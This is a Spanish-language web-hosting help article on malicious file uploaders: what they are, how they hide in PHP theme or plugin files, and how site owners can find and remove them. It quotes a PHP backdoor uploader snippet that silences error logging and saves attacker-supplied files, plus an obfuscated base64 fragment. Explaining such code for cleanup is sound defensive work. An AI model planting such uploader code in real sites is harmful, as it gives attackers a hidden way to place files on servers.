¿Qué es un cargador de archivos malicioso?
Un cargador de archivos malicioso es un archivo o secuencia de comandos que permite a un atacante cargar archivos adicionales con el propósito de un uso malicioso. Los cargadores maliciosos generalmente permitirán que se cargue cualquier archivo en el sitio web sin ningún control de seguridad, lo que crea un gran riesgo para el sitio web. Un cargador puede verse como un código de sitio normal o puede estar ofuscado (oculto intencionalmente para hacer que el código sea ambiguo). Puede ser un archivo independiente o puede insertarse en un archivo de sitio normal, ya sea dentro de archivos centrales, archivos de complementos o archivos de temas.
Determinar si su sitio está infectado
Un cargador de archivos por sí solo es difícil de detectar a partir de una revisión casual de los archivos del sitio. Por lo general, el propietario de un sitio recibe una alerta sobre la presencia de archivos maliciosos más obvios, ya sean páginas de spam, enlaces de spam o redireccionamientos maliciosos, y una revisión de los archivos del sitio encuentra un cargador de archivos malicioso escondido en algún lugar dentro de los archivos del sitio.
Encontrar y eliminar el cargador de archivos malintencionado
La eliminación de cargadores de archivos maliciosos requiere un análisis del código del sitio. Los cargadores de archivos generalmente se encuentran dentro de los archivos php en el servidor web. Pueden insertarse en su núcleo, complemento o archivos de tema, o pueden ser un archivo independiente. Los cargadores de archivos maliciosos se pueden encontrar en cualquier directorio de acceso público en su servidor.
A veces, el cargador de archivos maliciosos está ofuscado y no parece que haga nada específico a primera vista. Es posible que deba decodificar la ofuscación para determinar qué está haciendo el archivo. El código ofuscado puede contener lo siguiente.
base64_decode(...aW5wdXQgdHlwZT0iZmlsZSI=...) |
Otras veces, el código será una combinación de html y php y tendrá referencias a los archivos que se cargan. Un script de carga de archivos no oculto generalmente contiene un formulario con un tipo de campo como tipo de entrada = “archivo” dentro de él. Sin embargo, no todos los scripts de carga son maliciosos, por lo que determinar si un archivo es malicioso, desprotegido o sospechoso de alguna otra manera requerirá un análisis del código circundante.
Para eliminar el cargador de archivos, determine qué archivo contiene los scripts de carga y elimine el archivo o el código dentro del archivo válido. La secuencia de comandos de carga de archivos suele ser un formulario que utiliza el tipo de entrada de archivo para seleccionar el archivo del atacante.
A continuación, se muestra un ejemplo de un cargador de archivos adjunto al principio de un archivo de tema.
@ini_set('display_errors','off'); @ini_set('log_errors',0); @ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0); ignore_user_abort(true); if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {@ini_set('upload_max_filesize','1000000'); $size=$_POST['size']; $open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name']; $image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp); |
Puede buscar en los archivos de su sitio cualquier entrada de formulario que tenga un tipo de entrada = archivo. Una forma no confusa puede tener un aspecto similar a esto. Como todo es código HTML válido, es posible que los escáneres de virus no detecten intenciones maliciosas.
<form action="upload.php" method="post" enctype="multipart/form-data"> Select image to upload: <input type="file" name="AnyNameHere" id="AnyNameHere"> <input type="submit" value="Upload Image" name="submit"></form> |
Más allá del cargador de archivos malicioso
Si encuentra una secuencia de comandos de carga de archivos maliciosa en su sitio web, es importante no solo determinar cómo se colocó ese archivo en su sitio, sino también encontrar otras secuencias de comandos maliciosas en su sitio. Los atacantes a menudo colocan más de un script de carga en un sitio y, a menudo, se combinan con más ataques maliciosos, como redireccionamientos maliciosos , páginas de spam o desfiguraciones.
También es importante determinar cómo se vio comprometido el sitio. Es importante revisar todo el sitio.
Neothek ofrece servicios de web hosting, registro de dominios, correo electrónico, certificados SSL, diseño de páginas web y diseño gráfico.
